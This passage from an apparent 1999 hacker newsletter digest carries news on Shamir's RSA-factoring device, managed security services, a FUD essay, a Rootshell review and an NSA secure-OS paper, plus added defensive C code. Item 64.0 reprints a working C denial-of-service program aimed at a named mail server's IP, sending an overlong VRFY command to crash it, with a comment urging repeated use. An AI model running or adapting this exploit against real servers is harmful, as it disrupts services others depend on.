     emitting diodes. The 6-by-6-inch optical computer would measure the light from diodes to perform mathematical calculations solving 512-bit RSA
     encryption keys faster than ever - within two or three days. An effort in February to solve shorter, easier 465-bit keys took hundreds of computers and
     several months. 
     
     Shamir first informally showed a prototype of his device at a conference in Prague, the Czech Republic, in May. He publicly outlined its workings at length
     for the first time Thursday. 
     
     "Twinkle is a little out there, but it looks like it's buildable to me," said Seth Goldstein, an expert in computer architecture at Pittsburgh's Carnegie Mellon
     University. 
     
     Organized crime, friendly and unfriendly governments, research institutions and others might take an interest in such a project, conference participants
     suggested. 
     
     In any event, users of 512-bit keys "should be worried," said Christof Paar, a computer engineer at Worcester Polytechnic Institute. 
     
     "In the current state of the art, it is not secure," added Bob Silverman, a research scientist at Bedford-based RSA Laboratories, a division of RSA Data
     Security. Shamir co-founded RSA Data but no longer works there. 
     
     Longer keys, such as 1,024-bit, are already employed for many sensitive communications. But, out of intelligence and other concerns, the U.S.
     government requires special permission to export software with the longer keys. The most popular browsers are normally set to just 512 bits. 
     
     Brian Snow, a technical director for information security at the National Security Agency, spoke to the conference Thursday about weak quality assurance
     in commercial security products. But he declined to answer general questions for the press. 
     
     Though available, longer keys are harder to set up and take more computer power to operate. Such power may be scarce in the wireless telephones,
     home appliances and other computerized conveniences of the future, cryptographers said. 
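
     A key-length audit of the kind the article's warning calls for, as an added example that is not from the article or from RSA Laboratories: it reads the modulus size out of a DER-encoded PKCS#1 RSAPublicKey and flags anything shorter than 1,024 bits. The threshold, the function names and the sample keys (filler bytes, not real keys) are assumptions of this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Policy threshold (assumption): the article names 1,024-bit keys as the stronger choice. */
#define MIN_RSA_BITS 1024

enum key_verdict { KEY_MALFORMED = -1, KEY_WEAK = 0, KEY_OK = 1 };

/* Read a DER tag+length header at *pos. Returns 0 and leaves *pos at the
 * first content byte with *len set, or -1 on a wrong tag or bad length. */
static int der_header(const uint8_t *buf, size_t size, size_t *pos,
                      uint8_t want_tag, size_t *len)
{
    if (size < 2 || *pos > size - 2 || buf[*pos] != want_tag) return -1;
    uint8_t first = buf[*pos + 1];
    *pos += 2;
    if (first < 0x80) {                     /* short form */
        *len = first;
    } else {                                /* long form: 1 or 2 length bytes */
        size_t n = first & 0x7f;
        if (n == 0 || n > 2 || n > size - *pos) return -1;
        for (*len = 0; n > 0; n--)
            *len = (*len << 8) | buf[(*pos)++];
    }
    return (*len <= size - *pos) ? 0 : -1;
}

/* Modulus size in bits of a PKCS#1 RSAPublicKey, i.e. DER
 * SEQUENCE { INTEGER n, INTEGER e }; -1 if the buffer is not one. */
int rsa_modulus_bits(const uint8_t *der, size_t size)
{
    size_t pos = 0, seq_len, n_len, e_len;
    if (der_header(der, size, &pos, 0x30, &seq_len) != 0) return -1;
    size_t end = pos + seq_len;
    if (der_header(der, end, &pos, 0x02, &n_len) != 0 || n_len == 0) return -1;
    const uint8_t *n = der + pos;
    pos += n_len;
    if (der_header(der, end, &pos, 0x02, &e_len) != 0 || e_len == 0) return -1;
    while (n_len > 0 && *n == 0x00) { n++; n_len--; }   /* drop sign-padding zero */
    if (n_len == 0) return -1;
    int bits = (int)n_len * 8;
    for (uint8_t top = *n; !(top & 0x80); top <<= 1)
        bits--;                             /* leading zero bits of the top byte */
    return bits;
}

/* Classify a key against the policy threshold. */
enum key_verdict audit_rsa_key(const uint8_t *der, size_t size)
{
    int bits = rsa_modulus_bits(der, size);
    if (bits < 0) return KEY_MALFORMED;
    return bits < MIN_RSA_BITS ? KEY_WEAK : KEY_OK;
}

/* Write a DER tag and a short- or long-form length; returns bytes written. */
static size_t put_header(uint8_t *p, uint8_t tag, size_t len)
{
    size_t i = 0;
    p[i++] = tag;
    if (len >= 0x100) { p[i++] = 0x82; p[i++] = (uint8_t)(len >> 8); }
    else if (len >= 0x80) p[i++] = 0x81;
    p[i++] = (uint8_t)len;
    return i;
}

/* Constructed sample, not a real key: filler modulus of `bits` bits with
 * e = 65537. Returns the encoded length, or 0 if it does not fit. */
size_t make_sample_key(unsigned bits, uint8_t *out, size_t cap)
{
    static const uint8_t e65537[] = { 0x02, 0x03, 0x01, 0x00, 0x01 };
    uint8_t body[600];
    size_t nbytes = bits / 8, i;
    if (bits % 8 != 0 || nbytes == 0 || nbytes > 512) return 0;
    i = put_header(body, 0x02, nbytes + 1);
    body[i++] = 0x00;                       /* keeps the INTEGER positive */
    memset(body + i, 0xA5, nbytes);         /* top bit set: exactly `bits` bits */
    i += nbytes;
    memcpy(body + i, e65537, sizeof e65537);
    i += sizeof e65537;
    if (i + 4 > cap) return 0;
    size_t h = put_header(out, 0x30, i);
    memcpy(out + h, body, i);
    return h + i;
}

int main(void)
{
    unsigned sizes[] = { 512, 1024, 2048 };
    uint8_t key[600];
    for (size_t i = 0; i < 3; i++) {
        size_t n = make_sample_key(sizes[i], key, sizeof key);
        printf("%u-bit sample: parsed %d bits, verdict %d\n", sizes[i],
               rsa_modulus_bits(key, n), (int)audit_rsa_key(key, n));
    }
    return 0;
}
```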
     
     @HWA
     
60.0 Security police isn't doing enough
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.403-security.org/
     
     Astral 12.08.1999  meteor rain

     Former federal prosecutor, Mark Rasch, says that while current cybercrime laws are extremely broad and could possibly be
     interpreted in such a way that makes most internet users criminals, businesses should still invest heavily in network security.
     Links:
     ZDNet     
     (Story url not found on ZDNet)
     
61.0 Hack attacks drive outsourced security
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From ZDNet http://www.zdnet.com/filters/printerfriendly/0,6061,411335-54,00.html
     
     --------------------------------------------------------------
     This story was printed from PC Week,
     located at http://www.zdnet.com/pcweek.
     --------------------------------------------------------------
     
     Hack attacks drive outsourced security
     By Jim Kerstetter and John Madden, PC Week
     August 8, 1999 9:03 PM PT
     
     When it comes to implementing network security, even the outsourcers are turning to outsourcing
     partners.
     
     Internet Security Systems Inc., the company that put network intrusion detection on the map, will
     announce this month that it is providing managed security services to Internet service providers such
     as AT&T Corp. and to outsourcing companies such as Electronic Data Systems Corp. ISS has
     similar partnerships in the works with British Telecommunications plc., MCI WorldCom Advanced
     Networks and Nippon Telephone & Telegraph Corp., officials said.
     
     Driving this second layer of outsourcing is the complexity of security technology, particularly
     vulnerability scanning and intrusion detection, along with a shortage of people who can manage such
     a critical part of a company's network. "We've actually been doing this ... for some time with a few
     customers," said Tom Noonan, CEO of ISS, in Atlanta. "It's finally gaining some traction."
     
     It's also likely to gain interest from harried IT administrators at places such as Cornell University's
     Graduate School of Management. Two weeks ago, hackers broke into one of the school's Sun
     Microsystems Inc. servers running a database of statistical research material. The intruder had set
     up a File Transfer Protocol site on the server, presumably to take out information.
     
     "[Intrusion detection] is almost becoming a full-time job--detecting it and then cleaning up after it,"
     said Kevin Baradet, the Ithaca, N.Y., graduate school's network services director. Baradet is looking
     to purchase intrusion detection software for the graduate school, with 24-by-7 support likely to weigh
     heavily on his mind, he said.
     
     Security outsourcing is not new. IBM Global Services, in Armonk, N.Y., has more than 450 people
     dedicated to security, including an implementation program for ISS products. Companies such as
     GTE Internetworking have been hosting security products for years.
     
     But now, many more players are jumping into the market.
     
     Compaq Computer Corp., for example, has begun a pilot project with ISS to provide intrusion
     detection. The Houston company's Security Healthcheck service will, for now, be entirely managed
     by Compaq consultants. It's in pilot testing with several customers and will be in general release by
     the end of the year, said officials at Compaq's services division in Stow, Mass.
     
     In addition, Control Data Systems Inc., of Arden Hills, Mich., last week announced security
     outsourcing services, including perimeter security, data and resource protection, management and
     monitoring, and identification and authentication.
     
     For ISS, the next step is taking those relationships further. Not only is the company selling the
     software and training to outsourcing partners, it also is providing a managed service to those
     companies to ensure they're properly addressing their customers' security needs.
     
     The outsourcing partners will set the pricing for the security services; IT managers can expect that
     upfront costs will be less than buying their own security solutions. ISS' RealSecure Network Engine,
     for example, costs $8,995, a price that doesn't include implementation or paying a trained
     administrator to monitor it around-the-clock.
     
     Over the coming year, ISS plans to improve the scalability of its vulnerability scanning and intrusion
     detection products to make them more suitable for outsourced management, Noonan said.
     
     In essence, ISS is offering itself as a manager of the burglar alarms of corporate networks, usually
     through the outsourcing partner. "There is a need for someone to be the ADT [Security Services
     Inc.] of the Internet," Noonan said. "And we might as well lay claim to that."
     
     @HWA     
     
62.0 Backdoors in Windows?
     ~~~~~~~~~~~~~~~~~~~~~
        
        Are there "back doors" in Windows 95 and 98, where hackers on the Internet can get info from your PC?
    -- Louis from Seaside Heights
    ZDTV
   
   
   
    It is possible for hackers to get to your computer if you share hard drives or have a static IP address. 
   
    At Rootshell (http://www.rootshell.com), ICSA (http://www.icsa.net), and the Computer Emergency Response Team (http://www.cert.org), you can learn about how
    people do this on Windows 95. These are very useful webpages for security problems. You may also want to check out such newsgroups as comp.risks.
   
    If you use a dial-up connection, your computer's IP address will not stay the same, so hackers will have a hard time locating it. However, computers that use a cable
    modem or network access with a static IP address are a little bit easier to hack. 
   
    You shouldn't be too paranoid, though: Evil hackers are mostly concerned with banks, the Pentagon, and keeping Babylon 5 on the air, not what you have on your
    personal PC.
   
    At any rate, see below for a list of links with information about online security.
   
    Rootshell
    http://www.rootshell.com
    
    Computer Emergency Response Team
    http://www.cert.org
    The US Department of Energy's Computer Incident Advisory Capability
    http://ciac.llnl.gov
    ICSA
    http://www.icsa.net
    DigiCrime (it's harmless, we promise!)     
    http://www.digicrime.com/dc.html
    
    @HWA
     
63.0 The NewbiesThe Newbie's Guide to Fear, Uncertainty, and Doubt
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From Buffer Overflow on HNN http://www.hackernews.com/
     
     By: Brian Martin

     Introduction


     Fear, Uncertainty and Doubt (FUD). We all live with it, and
     we're all accustomed to it at one level or another: "Do I
     have enough insurance?"; "Did I leave the coffee pot on
     when I left for work this morning?"; "Will my proposal be
     accepted by management?" FUD is simply a facet of life;
     something with which we all must contend to the best of
     our abilities. 

     FUD is yet another method often employed by a party
     (typically a vendor in our context) to help propagate their
     product or service. In short, this is achieved by
     attempting to instill a sense of fear, uncertainty or doubt
     in the minds of consumers regarding a competitor's
     product. By instilling FUD in the minds of consumers, the
     vendor obliquely promises dire consequences if the
     intended target does not buy their goods. 

     The obvious fallacy with this approach is that a vendor's
     product or service (P&S) is not sold on its own merit;
     rather it is sold as a "reasonable alternative". FUD's
     primary goal is to scare consumers away from using
     superior P&S in favor of inferior (yet often more
     recognized) P&S. 

     According to the New Hacker's Dictionary (aka the Jargon
     file), FUD is defined as: FUD /fuhd/ n. 

     Defined by Gene Amdahl after he left IBM to found his own
     company: "FUD is the fear, uncertainty, and doubt that
     IBM sales people instill in the minds of potential customers
     who might be considering [Amdahl] products." The idea, of
     course, was to persuade them to go with safe IBM gear
     rather than with competitors' equipment. This implicit
     coercion was traditionally accomplished by promising that
     Good Things would happen to people who stuck with IBM,
     but Dark Shadows loomed over the future of competitors'
     equipment or software. See IBM. After 1990 the term FUD
     was associated increasingly frequently with Microsoft, and
     has become generalized to refer to any kind of
     disinformation used as a competitive weapon. (1) 

     The past few years have brought a dramatic increase in
     the FUD tactic. Not only are large companies using it to
     help stifle new and upcoming competition, in addition,
     uneducated journalists are wielding it like a four year old
     with a loaded gun: unaware of the danger, or of the
     consequences. 

     The use of FUD in a marketing campaign is often subtle
     and hard to spot. Well written FUD will blend in among
     facts and be difficult to discern. Worse, this underhanded
     tactic is often hard to counter. Rather
     than fighting against incorrect facts or misguided opinions,
     you find yourself battling vague assertions, self-serving
     maxims, and half-truths. 

     Worse yet is spotting the FUD campaign in the first place.
     Because it is an effective weapon based on half-truths,
     distinguishing it from legitimate opinion may be difficult.
     For an excellent paper and well documented examples of
     this, consult the paper titled 'FUD 101'. (2) In this
     document, Mr. Green outlines several elements and
     examples of Microsoft using a FUD campaign against the
     Linux Community. 

     In today's world of articles and press releases, we can
     identify several levels of FUD. This is important as it tells
     us how to respond to the 'news'. The more FUD, the more
     skepticism that should be given to it. The less FUD, the
     better the chance it was just uneducated conclusions
     that led to the text. 

     Twelve Elements of FUD


     To help newcomers to the world of FUD, I have come up
     with a list of twelve elements that can be and are used. In
     order to make this even easier for the consumer, I have
     devised a scale to help qualify the 'FUD level' used in a
     particular piece of writing. While this delineation is by no
     means an exact science, it can help put into perspective
     the subtle technique of disinformation. 

     a) Urgency 

     1) Buy our product now to avoid headache tomorrow!
     While this may be appealing initially, this often comes at
     the sacrifice of features or performance. Yes, it may be
     easy to use, but odds are it does a third of what
     competitors' products do. 

     2) Buy our product now because tomorrow our product will
     kick ass!
     The promise of future development (also known as
     'vaporware') encourages you to purchase the product now
     in order to receive future upgrades that will be better
     than what is on the market now. Obviously, this does
     nothing but hurt you in the here and now. 

     b) Supporters 

     3) No quoted names.
     In this world of technology professionals, it is easy to find
     someone who is a) qualified, b) supportive of the product
     and c) willing to go on the record. Any article that
     claims a P&S is desired or supported, but
     lacks names to back those claims, should be questioned.
     Why couldn't they find at least one person to go on
     record endorsing the product? 

     4) Quoting known frauds and charlatans.
     Worse than quoting no one is to quote frauds. Rather than
     not finding someone to endorse a P&S, they had to turn
     to someone that is well known for NOT knowing
     technology. These people will often go on the record
     endorsing anything if it propagates their name or
     company, or leads to them receiving some kind of
     incentive (read: cash). 

     c) Technical

     5) Epiphany Nomenclature Significance Naught (3)
     The use of large or fancy words in place of readily
     understood technical terms. Obscuring features behind
     words that sound impressive is a common way of hiding
     the truth. This technique is often known as 'buzzword
     compliance'. 

     6) Hyping up old or standard features in place of current
     or impressive technology.
     We all use and trade email, so a company drooling over
     themselves in light of their amazing use of the SMTP (4)
     protocol means very little. 

     d) Harm

     7) Without our P&S, you'll be hacked!
     New security and crypto based companies are fond of
     using this ploy. Without their products, you are a time
     bomb waiting to go off! Come tomorrow, evil and malicious
     hackers will intrude upon your network, deface your web
     page, read your corporate secrets and pour sand in your
     gas tank! 

     8) Without our P&S, you will not get future business!
     The trend of business is moving toward our product and
     what we deem standardizations! If you and your company
     don't jump on our bandwagon, no other company will do
     business with you! As we all know, new technology and
     new standards are only adopted after long and rigorous
     testing. To move over to a new platform or protocol
     simply because some company says so is ludicrous. 

     9) Without our P&S, you will lose time and money!
     This varies slightly from #2 in that the FUD centers around
     your company losing time and money today, not
     tomorrow. As we all know, any enterprise outfit that could
     possibly lose money in a matter of days without a specific
     product not already implemented is doomed to begin with. 

     e) Spin Doctoring (2) 

     10) Hyping opponent's weakness
     No more than a form of mudslinging, the company doesn't
     rely on its own merit to persuade you to use their
     products. Rather, they must display their opponent's
     weaknesses and use them to convince you not to use
     theirs. 

     11) Creating weaknesses for the opponent
     Sometimes an opponent has very few weaknesses. So,
     why not make some up? Clever wording and sometimes
     outright lies lead to one company creating supposed
     weaknesses in competitors' P&S. 

     12) Attacking opponent's strengths
     Akin to #1, this relies on attacking the selling points of a
     competitor's P&S. Often times, you will see this used in
     conjunction with #1 to attempt to completely belittle the
     opposing P&S. 

     For fun and amusement, you can use the twelve points
     above to rate articles. If an article or press release uses
     some of the methods above, attribute it one point per
     method. In the end, you can say that a given article has
     a "FUD Factor of 4" or rated "7 on the FUD scale". Recent
     months have shown Microsoft to be repeat offenders,
     often rating between 5 and 10 on the FUD Scale. Their
     fear of the Linux operating system shows. No one should
     ever rate higher than a 10, unless the article is made up
     of nothing but FUD. 

     Response to FUD

     As with all problems, it does little good to discuss them
     without proposed solutions. With FUD, it is much more
     manageable and easy to deal with. 

     The first thing is recognizing FUD in all its forms.
     Awareness for the average person is the tricky part.
     Consider the average person that has an interest in the
     ever changing world of technology and networking. They
     go day to day without the benefit of forums that readily
     challenge these huge companies oozing FUD at every
     crevice. Unfortunately, they are the bulk of the customers
     and supporters of these P&S. Educating them is the first
     step toward an honest profession. 

     Second, is the response. Even if you do recognize a
     company peddling FUD, how do you respond? Very simple. 

     1) Mail the author of the FUD as well as their editor. When
     doing so, be polite and present facts to back your mail.
     Cite reference material, URLs or anything solid to back
     your argument and counter theirs. 

     2) Once mailed, give them a chance to correct their
     mistakes. Do not assume the FUD was intentional. The
     correction can come in the form of a retraction or followup
     article. As much as I hate to say it, the media machine
     may not allow for either. At that point, you must decide
     what to do. 

     3) Openly dispute the article in a public forum. Be it a mail
     list or web board, post the relevant parts of the article
     containing the FUD and refute them with your own facts.
     This causes a bit more strife but may be the only solution.

     Fin

     The use of Fear, Uncertainty, and Doubt in marketing
     campaigns -- while certain to get the public's attention --
     is plainly wrong. Armed with the above information, it's our
     hope that the reader will now be able to spot it, refute it,
     and most importantly, not buy into it. 

     Brian Martin
     Copyright 1999 Brian Martin 

     References 

     (1) Entry for FUD in the Jargon File 

     (2) Eric Green (eric@linux-hw.com) for his paper 'FUD
     101'. An excellent resource for real world examples and
     definitions.
     http://members.tripod.com/~e_l_green/fud101-4.html 

     (3) By using standard synonyms from
     www.dictionary.com, we can create an alternate phrase
     that sounds impressive, yet means nothing. Fancy ->
     Epiphany, Words -> Nomenclature, Meaning ->
     Significance, Nothing -> Naught. "Fancy words meaning
     nothing". 

     (4) SMTP stands for Simple Mail Transfer Protocol. The
     existing protocol that has been delivering your e-mail for
     over a decade. 

     Thanks Space Rogue (spacerog@l0pht.com) for the idea
     of this paper and harassment.
     ATTRITION Staff (staff@attrition.org) for peer review and
     harassment.
     Anna Henricks, Geekgrl, and especially Jay Dyson for proof
     reading and suggestions. 
     
     @HWA


64.0 Crashing AntiOnline's SMTP server?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From http://www.innerpulse.com/

     Crash AntiOnline SMTP Server? 
     Contributed by siko
     Tuesday - August 10, 1999. 09:17PM UTC 

       An anonymous contributor submitted source code that is supposed to crash
     AntiOnline's SMTP/pop3 servers. This is unconfirmed and not supported by
     Innerpulse staff. (ditto for HWA staff =),- Ed)
     
     
  
  
     anti-smtp.c    
    
        
     
     /*
      * This simple piece of code will exploit one of the many buffer overflow problems
      * with the SMTP/POP3 daemon software on the Antionline mail server, causing a denial of
      * service. I'm sure there are much more serious problems which could be caused,
      * if you know what I mean. Give this to everyone you know. Tell them to run it
      * over and over. Maybe that will convince JP to fix this, because it's been around
      * for months and months, and he's been notified of it more than once. I wish I 
      * didn't have to do this.
      *
      * Cheers, 
      *
      * -- jbx
     */
     
     #include <stdio.h>
     #include <errno.h>
     #include <netinet/in.h>
     #include <arpa/inet.h>
     #include <sys/types.h>
     #include <sys/socket.h>
     
     char arg1[] = "vrfy ";
     char *sendbuffer;
     
     #define CHARACTERS_TO_SEND 475
     
     int main(void) {
     
             int thesocket;
             int counter = 0;
     
             struct sockaddr_in foonet;
             foonet.sin_port = htons(25);
             foonet.sin_family = AF_INET;
             foonet.sin_addr.s_addr = inet_addr("209.166.177.36");
             // foonet.sin_addr.s_addr = inet_addr("127.0.0.1");
     
             sendbuffer = (char *)malloc(1000);
     
             if((thesocket = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                     perror("Error creating socket");
                     exit(1);
             }
     
             printf("Connecting to the server...\n");
             if(connect(thesocket, (struct sockaddr *)&foonet, sizeof(struct sockaddr)) == -1) {
                     if(errno == ECONNREFUSED) {
                             printf("Connection refused. Most likely someone else has crashed it already.\n");
                             exit(1);
                     }
                     perror("Unable to connect");
                     exit(1);
             }
     
             sprintf(sendbuffer, arg1);
             while(counter != CHARACTERS_TO_SEND) {
                     strcat(sendbuffer, "x");
                     counter++;
             }
             strcat(sendbuffer, "\r\n");
     
             write(thesocket, "helo localhost\r\n", 16); 
             sleep(2);       
     
             printf("Sending the string...\n");
             write(thesocket, sendbuffer, strlen(sendbuffer));
     
             close(thesocket);
     
             printf("Done. The service is now toast, and although it may still accept connections,\nit's not working.\n");
     }
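
     For the defending side, the input check that a VRFY line like the one above has to pass before it reaches any fixed-size buffer, as an added example that is not code from Innerpulse, the contributor or the mail server's vendor. The daemon's source is not on this page, so the unbounded copy is an assumption based on the program's own "buffer overflow" comment; the limits are those of RFC 821 section 4.5.3, and smtp_parse_line, struct smtp_cmd and build_vrfy are hypothetical names.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define SMTP_MAX_LINE 512   /* RFC 821 sec. 4.5.3: command line, CRLF included */
#define SMTP_MAX_ARG   64   /* RFC 821 sec. 4.5.3: user name or domain */

struct smtp_cmd {
    char verb[5];                   /* four-letter verb, upper-cased, NUL-terminated */
    char arg[SMTP_MAX_ARG + 1];     /* bounded copy of the argument */
};

/* Validate one command line of `len` bytes as read from the socket (not
 * NUL-terminated). Returns 0 and fills *out when the line is acceptable,
 * otherwise the SMTP reply code to send back: 500 (line too long, missing
 * CRLF, unknown verb) or 501 (argument missing or too long). */
int smtp_parse_line(const char *line, size_t len, struct smtp_cmd *out)
{
    memset(out, 0, sizeof *out);
    if (len < 6 || len > SMTP_MAX_LINE)             /* verb + CRLF at minimum */
        return 500;
    if (line[len - 2] != '\r' || line[len - 1] != '\n')
        return 500;
    len -= 2;
    for (size_t i = 0; i < len; i++)                /* no NUL, bare CR or LF */
        if (line[i] == '\0' || line[i] == '\r' || line[i] == '\n')
            return 500;
    for (int i = 0; i < 4; i++) {
        if (!isalpha((unsigned char)line[i]))
            return 500;
        out->verb[i] = (char)toupper((unsigned char)line[i]);
    }
    if (len > 4 && line[4] != ' ')
        return 500;
    const char *arg = line + 4;
    size_t arg_len = len - 4;
    while (arg_len > 0 && *arg == ' ') {            /* skip separator spaces */
        arg++;
        arg_len--;
    }
    int takes_arg = !strcmp(out->verb, "VRFY") || !strcmp(out->verb, "HELO");
    if (!takes_arg && strcmp(out->verb, "QUIT") && strcmp(out->verb, "NOOP"))
        return 500;
    if (takes_arg != (arg_len > 0))
        return 501;
    if (arg_len > SMTP_MAX_ARG)                     /* length checked before the copy */
        return 501;
    memcpy(out->arg, arg, arg_len);                 /* out->arg was zeroed: stays terminated */
    return 0;
}

/* Constructed test input: "vrfy " + nchars filler characters + CRLF.
 * Returns the line length, or 0 if it does not fit in buf. */
size_t build_vrfy(char *buf, size_t cap, size_t nchars)
{
    if (nchars + 7 > cap)
        return 0;
    memcpy(buf, "vrfy ", 5);
    memset(buf + 5, 'x', nchars);
    memcpy(buf + 5 + nchars, "\r\n", 2);
    return nchars + 7;
}

int main(void)
{
    char line[1200];
    struct smtp_cmd cmd;
    size_t n = build_vrfy(line, sizeof line, 475);  /* size used by the posted program */
    printf("vrfy + 475 chars (%zu bytes) -> %d\n", n, smtp_parse_line(line, n, &cmd));
    n = build_vrfy(line, sizeof line, 10);
    printf("vrfy + 10 chars -> %d, arg=%s\n", smtp_parse_line(line, n, &cmd), cmd.arg);
    return 0;
}
```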
     
     
   @HWA  
     
               
65.0 Rootshell.com review
     ~~~~~~~~~~~~~~~~~~~~
   
     http://www.techsightings.com/cgi-bin/ts_review.pl?52
   

                Hackers and Crackers Go Mainstream 
                Wednesday - 26/Aug/1998 by Robin Miller
     Since Rootshell went online in mid-1997, I
     thought of it as a premier hacker/cracker site
     where break-in exploits (with detailed scripts) got posted for use by
     others who enjoy this game. But as of August 1998, it's a "Network
     Security Information Site." 

     I'm sure many professional network security people already read
     Rootshell at least once a week. More should. Despite its surface
     turnabout, it's still full of security bug findings, usually with detailed
     instructions on how to exploit them. Indeed, several Pentagon officials
     have blamed Rootshell for some of the kid-type hack attempts made
     against some DoD sites in late 1997 and early 1998. 

     But not everyone in our military establishment is braindead, and by the
     time the kiddies who follow Rootshell were trying the "Hack the
     Pentagon" scripts they found there, defenses had been erected -- and
     all their attempts failed. 

     Rootshell is platform-agnostic. Bug reports and security flaws listed
     here cover UNIX, Windows and NT, Mac, Linux, FreeBSD, Solaris, and
     everything else that pops up. There's a mailing list (outbound only, low
     volume) that keeps you up to date on new info and news, and is well
     worth subscribing to if you have any interest -- from either direction -- in
     computer and network security. 

     One last note: Rootshell, even in its new incarnation, still contains this
     disclaimer, and I'd personally appreciate it if you read and follow it. 

     "By using this site you agree you will use the information on this site for
     lawful purposes only and will not use this information to gain
     unauthorized access. Information on this site is for educational
     purposes ONLY. If you do not agree with this, please leave now." 

     Check it out               
     http://www.rootshell.com/
     
     @HWA
     
66.0 The inevitability of failure.
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     17 December 1998: Stephen Smalley notes: The slides and notes from our presentation at the NISSC for this paper are available at:
     http://www.cs.utah.edu/~sds/inevit-abs.html. 
     
     14 November 1998
     Source: http://csrc.nist.gov/nissc/1998/proceedings/paperF1.pdf (62K) 
     
     Full list of NISSC 98 papers: http://csrc.nist.gov/nissc/1998/papers.html (Link fixed). Thanks to JM/RH. 
     
     
     
                                             The Inevitability of Failure:
                                              The Flawed Assumption of
                                                   Security in Modern 
                                              Computing Environments
     
                                         Peter A. Loscocco, Stephen D. Smalley, 
                                       Patrick A. Muckelbauer, Ruth C. Taylor, 
                                         S. Jeff Turner, John F. Farrell
                                                tos@epoch.ncsc.mil 
         
                                              National Security Agency 
              
          CONTENTS 
     
          Abstract 
     
          1 Introduction 
     
          2 The Missing Link 
     
               Mandatory Security
               Trusted Path 
     
          3 General Examples 
     
               3.1 Access Control
               3.2 Cryptography 
     
          4 Concrete Examples 
     
               4.1 Mobile Code
               4.2 Kerberos
               4.3 Network Security Protocols
               4.4 Firewalls 
     
          5 System Security 
     
          6 Summary 
     
          7 References 
     
          [Contents added to original] 
     
     
     
     Abstract 
     
     Although public awareness of the need for security in computing systems is growing rapidly, current efforts to provide security are unlikely to succeed. Current security
     efforts suffer from the flawed assumption that adequate security can be provided in applications with the existing security mechanisms of mainstream operating systems.
     In reality, the need for secure operating systems is growing in today's computing environment due to substantial increases in connectivity and data sharing. The goal of
     this paper is to motivate a renewed interest in secure operating systems so that future security efforts may build on a solid foundation. This paper identifies several
     secure operating system features which are lacking in mainstream operating systems, argues that these features are necessary to adequately protect general
     application-space security mechanisms, and provides concrete examples of how current security solutions are critically dependent on these features. 
     
     Keywords: secure operating systems, mandatory security, trusted path, Java, Kerberos, IPSEC, SSL, firewalls.
     
     1 Introduction 
     
     Public awareness of the need for security in computing systems is growing as critical services are becoming increasingly dependent on interconnected computing
     systems. National infrastructure components such as the electric power, telecommunication and transportation systems can no longer function without networks of
     computers [50]. The advent of the World Wide Web has especially increased public concern for security. Security is the primary concern of businesses which want to
     use the Internet for commerce and maintaining business relationships [24]. 
     
     The increased awareness of the need for security has resulted in an increase of efforts to add security to computing environments. However, these efforts suffer from
     the flawed assumption that security can adequately be provided in application space without certain security features in the operating system. In reality, operating system
     security mechanisms play a critical role in supporting security at higher levels. This has been well understood for at least twenty five years [2][54][39], and continues to
     be reaffirmed in the literature [1][35]. Yet today, debate in the research community as to what role operating systems should play in secure systems persists [11]. The
     computer industry has not accepted the critical role of the operating system to security, as evidenced by the inadequacies of the basic protection mechanisms provided
     by current mainstream operating systems. 
     
     The necessity of operating system security to overall system security is undeniable; the underlying operating system is responsible for protecting application-space
     mechanisms against tampering, bypassing, and spoofing attacks. If it fails to meet this responsibility, system-wide vulnerabilities will result. 
     
     The need for secure operating systems is especially crucial in today's computing environment. Substantial increases in connectivity and data sharing have increased the
     risk to systems such that even a careful and knowledgeable user running on a single-user system is no longer safe from the threat of malicious code. Because the
     distinction between data and code is vanishing, malicious code may be introduced, without a conscious decision on the part of a user to install executable code, whenever
     data is imported into the system. For example, malicious code could be introduced with a Java applet or by viewing apparently benign data that, in actuality, contains
     executable code [32][62]. More so than ever, secure operating systems are needed to protect against this threat. 
     
     The goal of this paper is to motivate a renewed interest in secure operating systems. By consolidating a number of well-documented examples from the literature, it
     argues that the threats posed by the modern computing environment cannot be addressed without support from secure operating systems and, as was stated in [8], that
     any security effort which ignores this fact can only result in a "fortress built upon sand." Section 2 describes a set of secure operating system features which are
     typically lacking in mainstream operating systems but are crucial to information security. The need for these features is highlighted in section 3, which examines how
     application-space access control and cryptography cannot provide meaningful security without a secure operating system. Section 4 provides concrete examples of how
     security efforts rely on these operating system security features. Section 5 discusses the role of operating system security with respect to overall system security.
     
     2 The Missing Link 
     
     This section identifies some features of secure operating systems which are necessary to protect application-space security mechanisms yet are lacking in mainstream
     operating systems. They form the "missing link" of security. Although this section only deals with features, it is important to note that features alone are inadequate.
     Assurance evidence must be provided to demonstrate that the features meet the desired system security properties and to demonstrate that the features are
     implemented correctly. Assurance is the ultimate missing link; although approaches to providing assurance may be controversial, the importance of assurance is
     undeniable.
     
     The list of features in this section is not intended to be exhaustive; instead it is merely a small set of critical features that demonstrate the value of secure operating
     systems. A more complete discussion on secure operating systems, including discussions of assurance, can be found in [25], [59] or [20]. Subsequent sections argue the
     necessity of these features by describing how application-space security mechanisms and current security efforts employing them are vulnerable in their absence. 
     
     Mandatory security 
     
     The TCSEC [20] provides a narrow definition of mandatory security which is tightly coupled to the multi-level security policy of the Department of Defense. This has
     become the commonly understood definition for mandatory security. However, this definition is insufficient to meet the needs of either the Department of Defense or
     private industry as it ignores critical properties such as intransitivity and dynamic separation of duty [12][22]. This paper instead uses the more general notion of
     mandatory security defined in [59], in which a mandatory security policy is considered to be any security policy where the definition of the policy logic and the
     assignment of security attributes is tightly controlled by a system security policy administrator. Mandatory security can implement organization-wide security policies.
     Others have referred to this same concept as non-discretionary security in the context of role-based access control [22] and type enforcement [39][7][13] (see footnote 1).
     
     ___________________ 
     
          1. Actually, long ago, the term non-discretionary controls was used for multi-level security as well [39]. 
     
     Likewise, as defined in [59], this paper uses a more general notion of discretionary security in which a discretionary security policy is considered to be any security
     policy where ordinary users may be involved in the definition of the policy functions and/or the assignment of security attributes. Here discretionary security is not
     synonymous with identity-based access control; IBAC, like any other security policy, may be either mandatory or discretionary [58].
     
